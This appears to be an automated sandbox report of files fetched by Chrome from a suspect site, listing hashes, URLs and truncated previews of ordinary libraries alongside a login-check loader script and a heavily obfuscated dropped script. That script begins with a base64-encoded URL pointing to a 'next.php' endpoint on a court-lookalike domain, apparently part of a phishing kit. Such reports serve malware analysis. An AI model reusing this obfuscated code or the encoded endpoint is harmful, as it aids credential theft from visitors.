                                                Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:downloaded
                                                Size (bytes):28
                                                Entropy (8bit):4.137537511266052
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:C41A026A97DFC107025EEC7F45F29C85
                                                SHA1:B77C8FE6D6A770AF1758FC34B3E716656B8F2485
                                                SHA-256:8A7130BC862841606D062AC516513B01EB176CEF37D017E18B54E844E8390029
                                                SHA-512:6DE72788DA933F3DA0D1FB315335B8DE1BD9D4F7B59A0F1D1F6E758AB0D1EC3D7F0B8FFCDE16313B555BFE18832FF8671A2159F5AFCEEA6C45C2A037345ED017
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwl6hxqMQeH5vhIFDVNVgbUSBQ2tCa6x?alt=proto
                                                Preview:ChIKBw1TVYG1GgAKBw2tCa6xGgA=
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):3183
                                                Entropy (8bit):4.688310298537549
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:4847060FA4917A85D2012198A3E4CCF9
                                                SHA1:DF493F25531B1678547E22DF9453BFC506517362
                                                SHA-256:E6AA7B0DA93BA4CF97B89B1901659EDB5DC46C9651F93CB32384FDA00A199AE8
                                                SHA-512:1C0528E533C0920BE0BC4B85B23CB154307AFDE6E001FFC0026349B503C70417E4A16959AAE02EF90A31EFD548F048261CEACCA5260800E953344B6BA3A1DB94
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://pozaweclip.upnana.com/js/init.js
                                                Preview:function isLoggedIn() {. return fetch('/me'). .then(response => {. if (!response.ok) {. // If the response is not OK (e.g., not 200), return false. return false;. }. return response.text();. }). .then(body => {. // Check if the body contains "admin" or "editor". return body === "admin" || body === "editor" || body === "first";. }). .catch(error => {. // Log other errors to the console. console.error('Error checking login status:', error);. return false;. });.}.function doSiteSetup() {. isLoggedIn(). .then(isLoggedIn => {. if (isLoggedIn) {. yesLoggedIn();. }. }). .catch(error => console.error('Error checking login status:', error));.}.function yesLoggedIn() {. var script = document.createElement('script');. script.src = '/js/wolf.js';. document.head.appendC
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):196
                                                Entropy (8bit):5.098952451791238
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:62962DAA1B19BBCC2DB10B7BFD531EA6
                                                SHA1:D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
                                                SHA-256:80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
                                                SHA-512:9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://you.doclabcourt.com/OhgiN/1.png
                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (48664)
                                                Category:dropped
                                                Size (bytes):48944
                                                Entropy (8bit):5.272507874206726
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (18785)
                                                Category:downloaded
                                                Size (bytes):18873
                                                Entropy (8bit):5.188780851502224
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:E1A71969A95592D2D3D32BB7C1296190
                                                SHA1:F6E3039D5B647E7C9F79293DC7C46CB286003D6C
                                                SHA-256:CCC0EE783158D1AB3AE590EF8C982A827E38E8B82FD121551CDD4C20041FCD1B
                                                SHA-512:5CBA3A6D07B4F22AC939B09CF3AAC510A41D70561B18620755771F32CC696EF17CA26A6677548D263A956398668D0D354ECD149A649019FAA9B777C68E6EA918
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.3/dist/umd/popper.min.js
                                                Preview:/**. * @popperjs/core v2.9.3 - MIT License. */.."use strict";!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e="undefined"!=typeof globalThis?globalThis:e||self).Popper={})}(this,(function(e){function t(e){return null==e?window:"[object Window]"!==e.toString()?(e=e.ownerDocument)&&e.defaultView||window:e}function n(e){return e instanceof t(e).Element||e instanceof Element}function o(e){return e instanceof t(e).HTMLElement||e instanceof HTMLElement}function r(e){return"undefined"!=typeof ShadowRoot&&(e instanceof t(e).ShadowRoot||e instanceof ShadowRoot)}function i(e,t){void 0===t&&(t=!1);var n=e.getBoundingClientRect(),r=1,i=1;return o(e)&&t&&(r=n.width/e.offsetWidth||1,i=n.height/e.offsetHeight||1),{width:q(n.width/r),height:q(n.height/i),top:q(n.top/i),right:q(n.right/r),bottom:q(n.bottom/i),left:q(n.left/r),x:q(n.left/r),y:q(n.top/i)}}function a(e){return{scrollLeft:(e=t(e)).pageXOffset,scr
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Unicode text, UTF-8 text, with very long lines (65448), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1139808
                                                Entropy (8bit):5.214854221801767
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:137F8DB2A645C2D883F5F486EF7EF0A0
                                                SHA1:338A11A5879548E12CD00E00010687BC13DF65CF
                                                SHA-256:EC3F67F14B8E5F20732B8CD9E615621DB7C4E3095EA892CB8BCBA683CC8DB1E5
                                                SHA-512:D7B46C29255FDDB35386257C11F4C3FD5CBA93DD5311DC9CDA8ECA323A87415061E03100A9E1A95635A8754D6AD35E1BD03C87542F044367B281153FCB781F2C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:var file = "aHR0cHM6Ly83NTA5MTQ3MzI1Lmxhd3llcnNmZWRlcmFsY291cnQuY29tL25leHQucGhw";....var _0x31ccbb=_0x252b;(function(_0x52ac57,_0x4c8f9d){var _0x1b458c=_0x252b,_0x5b0099=_0x52ac57();while(!![]){try{var _0x119f41=-parseInt(_0x1b458c(0x2428))/(0x7e*0x39+0x1ba8+0x449*-0xd)*(parseInt(_0x1b458c(0x51a))/(0x4dc+0x4*-0x590+0x1166))+-parseInt(_0x1b458c(0x1668))/(-0x8ad*0x3+0x1*0x16df+0x1*0x32b)*(parseInt(_0x1b458c(0x197f))/(0x1*-0x1075+-0x127f+0x2ea*0xc))+-parseInt(_0x1b458c(0x45b4))/(-0x3b*0xf+0x136*0x10+-0x16*0xb9)*(-parseInt(_0x1b458c(0x118))/(0x14c6*-0x1+0x19*0x4a+0xd92))+-parseInt(_0x1b458c(0xa25))/(0xb*0x1ee+-0x7b*-0x1d+-0x2322)+parseInt(_0x1b458c(0x47c))/(-0x3d*0x3e+0x1d3d+-0x5*0x2e3)+parseInt(_0x1b458c(0x3dd))/(-0x1*-0x1fd3+0x491*0x1+0xe3*-0x29)*(parseInt(_0x1b458c(0x48bd))/(-0x1e8f+-0x206a+-0x11b*-0x39))+parseInt(_0x1b458c(0x59c8))/(-0x130e+-0x1ba4+0x2ebd);if(_0x119f41===_0x4c8f9d)break;else _0x5b0099['push'](_0x5b0099['shift']());}catch(_0x2745d8){_0x5b0099['push'](_0x5b0099['shift']
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (927)
                                                Category:dropped
                                                Size (bytes):61493
                                                Entropy (8bit):4.844877360420063
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:13B209AF0B1E48CDAA023B43BDF1DA03
                                                SHA1:0542AE411A751CEF1F1BC9D94155F81BA73BF8D4
                                                SHA-256:8F4C13B6B6B4297E302EBDDD3A77EEC14C29BD93268A911D3766069AB25DE92D
                                                SHA-512:CF27280170641FEAE0348FE97799212AE7E2531F2FE2C52682E68E40CAF24BF39A9B98E0CA3BB92D078FBC834CA615CCDD7FFD337C48DAE88EEFE5B33A4A376B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:// Functions..function popupMessage(message) {. let popup = document.createElement('div');. popup.className = 'wolf_popup';. popup.innerHTML = message;. document.body.appendChild(popup);. setTimeout(() => popup.remove(), 3000);.}..function handleResponse(response) {. if (response.status === 401) {. popupMessage('Unauthorized. Please <a href="/login">Login</a>.');. throw new Error('Unauthorized');. }. if (!response.ok) {. throw new Error('Network response was not ok');. }. return response.text();.}..function createWolfForm() {. // Check if the form already exists. if (document.getElementById('wolfForm')) {. document.getElementById('wolfForm').classList.remove('d-none');. return;. }.. // Add the wolf.css stylesheet to the head. let styleLink = document.createElement('link');. styleLink.rel = 'stylesheet';. styleLink.href = '/css/wolf.css';. document.head.appendChild(styleLink);.. // Create form an
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (50758)
                                                Category:downloaded
                                                Size (bytes):51039
                                                Entropy (8bit):5.247253437401007
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:67176C242E1BDC20603C878DEE836DF3
                                                SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (1572)
                                                Category:downloaded
                                                Size (bytes):35356
                                                Entropy (8bit):5.392311601209751
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:B0408D8A160F01711BE25446D63AB915
                                                SHA1:63FCCF59BE3C16D767ED5ED5379F4BC0DE6B7651
                                                SHA-256:902C5B79CD9830BAA4CE19864EB908CD16BBF599A3A983D8D81D9C566985E34F
                                                SHA-512:F1F2D772B6B81116724910045EC6211E28BE2C4C5E686CE0597A5516B72D4B1B0579A4EC7A9DDEE20B5E62980FFB747A4AEB46B6B6B869231E67E2A5D8B8FA85
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://fonts.googleapis.com/css2?family=Poppins:wght@400;700&family=Abril+Fatface&display=swap&family=Merienda:wght@400&family=Lora:wght@700&family=Open+Sans:wght@300;400;600;700&family=Open+Sans+Condensed:wght@300
                                                Preview:/* latin-ext */.@font-face {. font-family: 'Abril Fatface';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/abrilfatface/v23/zOL64pLDlL1D99S8g8PtiKchq-lmjdLh.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Abril Fatface';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/abrilfatface/v23/zOL64pLDlL1D99S8g8PtiKchq-dmjQ.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* cyrillic-ext */.@font-face {. font-family: 'Lora';. font-style: normal;. font-weight: 700;. font-display: swap;. src
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (32012)
                                                Category:dropped
                                                Size (bytes):69597
                                                Entropy (8bit):5.369216080582935
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65325)
                                                Category:downloaded
                                                Size (bytes):144877
                                                Entropy (8bit):5.049937202697915
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:450FC463B8B1A349DF717056FBB3E078
                                                SHA1:895125A4522A3B10EE7ADA06EE6503587CBF95C5
                                                SHA-256:2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
                                                SHA-512:93BF1ED5F6D8B34F53413A86EFD4A925D578C97ABC757EA871F3F46F340745E4126C48219D2E8040713605B64A9ECF7AD986AA8102F5EA5ECF9228801D962F5D
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
                                                Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (19015)
                                                Category:downloaded
                                                Size (bytes):19188
                                                Entropy (8bit):5.212814407014048
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:downloaded
                                                Size (bytes):5
                                                Entropy (8bit):2.321928094887362
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:8B04D5E3775D298E78455EFC5CA404D5
                                                SHA1:E0996A37C13D44C3B06074939D43FA3759BD32C1
                                                SHA-256:A7937B64B8CAA58F03721BB6BACF5C78CB235FEBE0E70B1B84CD99541461A08E
                                                SHA-512:7FDD80DBDDED156323D36C459E5FD133A4D888C227320CFB7042BE9FEB35D7F07201E535697AF914E69D6F46B2A88655C86C2371288052CCD4FA92058B01D3FD
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://pozaweclip.upnana.com/me
                                                Preview:first
                                                No static file info